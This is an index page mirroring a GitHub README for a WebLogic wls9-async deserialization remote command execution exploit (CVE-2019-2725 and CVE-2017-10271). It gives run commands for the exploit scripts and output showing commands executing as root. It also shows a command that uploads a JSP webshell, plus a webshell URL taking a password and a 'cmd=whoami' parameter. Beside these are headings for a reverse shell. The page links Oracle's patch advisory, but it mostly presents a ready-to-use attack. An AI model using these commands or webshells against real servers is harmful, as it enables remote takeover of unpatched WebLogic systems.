Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/jas502n/cnvd-c-2019-48814
WebLogic wls9-async反序列化远程命令执行漏洞
https://github.com/jas502n/cnvd-c-2019-48814
Last synced: 9 days ago
JSON representation
WebLogic wls9-async反序列化远程命令执行漏洞
- Host: GitHub
- URL: https://github.com/jas502n/cnvd-c-2019-48814
- Owner: jas502n
- Created: 2019-04-24T12:24:48.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-05-26T13:36:18.000Z (over 5 years ago)
- Last Synced: 2024-08-01T09:23:04.296Z (3 months ago)
- Language: Python
- Size: 5.36 MB
- Stars: 244
- Watchers: 10
- Forks: 95
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CNVD-C-2019-48814
WebLogic wls9-async反序列化远程命令执行漏洞### 回显poc for weblogic
![](./command_see.jpg)
![](./CVE-2019-2725-see.jpg)### Patch update:
```https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
```
### 漏洞复现:```
http://10.10.20.166:7001/_async/AsyncResponseService
``````
curl -i http://10.10.20.166:7001/_async/favicon.ico
```
## CNVD-C-2019-48814 Video[![CNVD-C-2019-48814](https://i.ytimg.com/vi/KEgOrgcLu0s/hqdefault.jpg?sqp=-oaymwEZCNACELwBSFXyq4qpAwsIARUAAIhCGAFwAQ==&rs=AOn4CLCLGk3OZ83msmbe5IgfAq6EFN2Dhw)](https://github.com/jas502n/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.mp4)
```
python CNVD-C-2019-48814.py -u http://10.10.20.166:7001 -p 1.txt>>>>Common See:
write website favicon.ico
Don't Need RMI Serverhttp://10.10.20.166:7001/_async/favicon.ico
>>>>Request Success!
status_code:202C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1root
```
## Use RMI
![](./python.jpg)![](./burpsuite.jpg)
### CVE-2017-10271 No pactch
#### windows-linux-webshell
```
upadte: 自定义webshell名字,适用于windows or linux upload webshellpython async_webshell-all.py http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
```
![](./windows-linux-webshell.jpg)#### resever_shell
![](./reserve_shell.jpg)
#### command see
![](./command.jpg)
#### webshell
![](./webshell.jpg)